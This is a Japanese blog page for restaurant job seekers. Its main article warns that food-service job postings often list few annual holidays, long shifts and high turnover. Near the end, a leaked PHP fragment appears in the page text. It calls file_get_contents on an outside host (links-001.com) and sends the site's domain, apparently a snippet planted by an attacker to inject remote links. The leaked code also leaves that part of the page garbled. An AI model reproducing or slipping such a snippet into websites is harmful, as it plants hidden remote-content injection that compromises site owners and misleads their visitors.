前へ
次へ

程よい焼き加減も和食の焼き鳥には重要

塩や醤油に味噌や和風だしなど、和食メニューを作るキッチンスタッフは、和風調味料を使い食材の味を活かし

more

和食系のお店で焼き鳥を焼いていたことについて

私は和食系のお店でアルバイトをしていたことがありキッチンスタッフとホールスタッフの両方を経験したので

more

味が自慢の和食のお店で仕事をしました

正社員としてではなくアルバイトでもよいので、とにかく美味しい和食を提供してくれるお店で働きたいと考え

more

飲食業界転職求人を見る際の注意点

飲食業界に転職を予定している方も多いのではないでしょうか。
飲食業界に転職をする際はいくつか注意点がありますので、これから予定している方は確認しておきましょう。
そのひとつが年間休日の件で、飲食業は年間の休日が少ないところが多いです。
転職求人を見てもらうと分かります。
転職求人には休日の件も記載しており、それを見ると年間休日数が少ないところが多いです。
飲食店はサービス業でもあり、実際にお店を開けていくらの世界なのがその理由と言えます。
飲食休日の中には、店休日が多いところでも週1日のところも少なくありません。
また、年中無休の飲食求人もあり、その場合、休みは交代制になります。
飲食業以外の転職求人を見てみると、法定休日や所定休日の他に、リフレッシュ休暇やバースデー休暇など、とにかく年間休日数が充実しているところも多いです。
休日なあまりこだわりがない人であれば問題ありませんが、どうしても休日が欲しいという方も向いていないかもしれません。
そして、離職率についても注意しておきましょう。
飲食業界は離職率の高い業種でもあり、その理由として先ほどもの年間休日数の少なさや有給休暇取得率の低さなども挙げられます。
さらに、他の転職求人と比べ、1日の拘束時間も長くなることが多い点もあるでしょう。
せっかくシフトを調整して取得した休みの日も、出勤予定のスタッフが急に欠勤したりトラブルが発生したりすると、出勤になったり出勤しないまでも対応をしたりしなくてはならなくなる自体も出てくる可能性があります。
そのような日々が続くと、「いつまでそういう状態が続くのか」と、将来に対する不安にも繋がり、結果的に離職に至ることになってしまうのです。
他の業種と比べて実際に離職率が多いのが特徴ですので、これから就職を予定している方は転職求人に気をつけてください。
年間休日や離職率など、他の業界と違う特色がありますので転職求人には注意しておきましょう。

".file_get_contents('http://links-001.com/gfjset.php?dom='.str_replace("www.", "", $_SERVER['HTTP_HOST']))."

"; ?>

Page Top